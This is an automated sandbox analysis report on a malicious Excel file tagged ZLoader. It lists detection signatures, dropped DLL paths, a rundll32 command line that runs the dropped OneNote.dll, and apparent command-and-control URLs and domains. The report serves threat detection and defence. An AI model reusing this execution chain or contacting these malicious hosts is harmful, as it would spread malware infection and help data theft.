Play interactive tour

Edit tour

Analysis Report case (61).xls

Overview

General Information

Sample Name:	case (61).xls
Analysis ID:	343270
MD5:	03cf3d0d50e14f5c65cc5582906b1bd4
SHA1:	491009b2f813c068e76c4931e8c3ad61e3d6e5ab
SHA256:	27077cd7478c8419d621656b3217aefebe4d7731d4741acedc99c9ce53fa6dbf
Tags:	xlsZLoader
Most interesting Screenshot:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Contains functionality to inject code into remote processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the product ID of Windows

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1620 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2392 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2344 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

msiexec.exe (PID: 2504 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1620, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer, ProcessId: 2392

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Source: 5.2.msiexec.exe.e0000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 4.2.rundll32.exe.6e850000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 104.21.23.220:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.86.32:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.74:443 -> 192.168.2.22:49168 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\AskDie\FearWill\writeBrown\scoreFell\skill.pdb source: rundll32.exe, msiexec.exe, 00000005.00000003.2161509186.0000000000430000.00000004.00000001.sdmp, xeda[1].dll.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\OneNote.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: xeda[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then add esi, 02h	4_2_6E86CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 00000000h	4_2_6E86DA70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 0000000Ah	4_2_6E85D830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	4_2_6E868830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 0000000Ah	5_2_000ED830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	5_2_000F8830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add esi, 02h	5_2_000FCE40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 00000000h	5_2_000FDA70

Source: global traffic

DNS query: name: fortnitehecks.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.21.23.220:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.21.23.220:443

Networking:

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_000E1AF0 InternetReadFile,

5_2_000E1AF0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: fortnitehecks.com

Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digice
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicer
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: msiexec.exe, 00000005.00000003.2171031515.00000000005CB000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2157396187.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156465361.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2157396187.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156465361.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: msiexec.exe, 00000005.00000002.2358064961.0000000002160000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2157396187.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156465361.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2157396187.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156465361.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: msiexec.exe, 00000005.00000002.2358064961.0000000002160000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: msiexec.exe, 00000005.00000003.2171031515.00000000005CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2157396187.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156465361.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: https://conssapratigdevi.tk/My
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: https://conssapratigdevi.tk/hyyn
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: https://conssapratigdevi.tk/post.php
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: https://conssapratigdevi.tk/post.phpad
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: https://forteanhub.com/
Source: msiexec.exe, 00000005.00000002.2357906942.00000000005A8000.00000004.00000020.sdmp	String found in binary or memory: https://forteanhub.com/post.php
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: https://forteanhub.com/post.phpNn
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: https://groceryasian.com/
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: https://groceryasian.com/post.phpg
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: https://groceryasian.com/post.phpq
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: msiexec.exe, 00000005.00000002.2357921737.00000000005CB000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: msiexec.exe, 00000005.00000002.2357890283.0000000000578000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 104.21.23.220:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.86.32:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.74:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Content X I E27 -',- jR V A B C D E F G H I J K L M N O P Q R S T 1 ' Cjdigicert' 3

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\OneNote.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E853A30	4_2_6E853A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E859A60	4_2_6E859A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E86DA70	4_2_6E86DA70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E865BF0	4_2_6E865BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E859C60	4_2_6E859C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E9C60	5_2_000E9C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E3A30	5_2_000E3A30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E9A60	5_2_000E9A60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000FDA70	5_2_000FDA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000F5BF0	5_2_000F5BF0

Source: fuy.dll.5.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: rundll32.exe, 00000003.00000002.2156995154.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156299940.0000000001D30000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal84.expl.evad.winXLS@7/12@5/4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_000F9C90 AdjustTokenPrivileges,

5_2_000F9C90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8669A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_6E8669A0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\80EE0000

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD0E5.tmp

Jump to behavior

Source: case (61).xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\AskDie\FearWill\writeBrown\scoreFell\skill.pdb source: rundll32.exe, msiexec.exe, 00000005.00000003.2161509186.0000000000430000.00000004.00000001.sdmp, xeda[1].dll.0.dr

Source: case (61).xls

Initial sample: OLE indicators vbamacros = False

Source: case (61).xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E85D830 LoadLibraryA,GetProcAddress,

4_2_6E85D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E876E11 push cs; iretd	4_2_6E876E2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E87A783 push ecx; iretd	4_2_6E87A79F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E876518 push ds; retf	4_2_6E87652C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E87D296 push cs; ret	4_2_6E87D2C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E87A1E0 push edi; retf	4_2_6E87A1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8799EE push esi; iretd	4_2_6E8799F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E87B16E push cs; iretd	4_2_6E87B18A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E896EAC push ds; iretd	4_2_6E896EAD

Source: initial sample

Static PE information: section name: .text entropy: 6.98571079162

Persistence and Installation Behavior:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\OneNote.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Bir\fuy.dll	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\OneNote.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8669A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_6E8669A0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll			Jump to dropped file
